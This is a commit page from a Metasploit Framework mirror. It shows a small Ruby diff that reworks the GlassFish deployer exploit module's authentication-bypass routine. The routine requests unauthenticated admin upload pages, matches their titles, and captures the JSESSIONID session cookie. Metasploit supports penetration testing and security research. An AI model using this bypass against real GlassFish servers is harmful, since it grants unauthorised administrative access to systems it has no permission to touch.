infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix auth bypass

bug/bundler_fix
wchen-r7 2015-06-24 19:49:04 -05:00
parent 8e4fa80728
commit c826785ebb
1 changed files with 9 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
modules/exploits/multi/http/glassfish_deployer.rb
View File

@ -631,20 +631,22 @@ class Metasploit3 < Msf::Exploit::Remote
end
def try_glassfish_auth_bypass(version)
sid = false
sid = nil
if version == '2.x' || version == '9.x'
print_status("Trying auth bypass...")
res = send_glassfish_request('/applications/upload.jsf', 'get')
p = /<title>Deploy Enterprise Applications\/Modules/
if res && res.code.to_i == 200 && res.body.match(p) != nil
sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); /).flatten.first
title = '<title>Deploy Enterprise Applications/Modules</title>'
if res && res.code.to_i == 200 && res.body.include?(title)
sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); */).flatten.first
end
else
# 3.0
print_status("Trying auth bypass...")
res = send_glassfish_request('/common/applications/uploadFrame.jsf', 'get')
p = /<title>Deploy Applications or Modules/
if res && res.code.to_i == 200 && res.body.match(p) != nil
sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); /).flatten.first
title = '<title>Deploy Applications or Modules'
if res && res.code.to_i == 200 && res.body.include?(title)
sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); */).flatten.first
end
end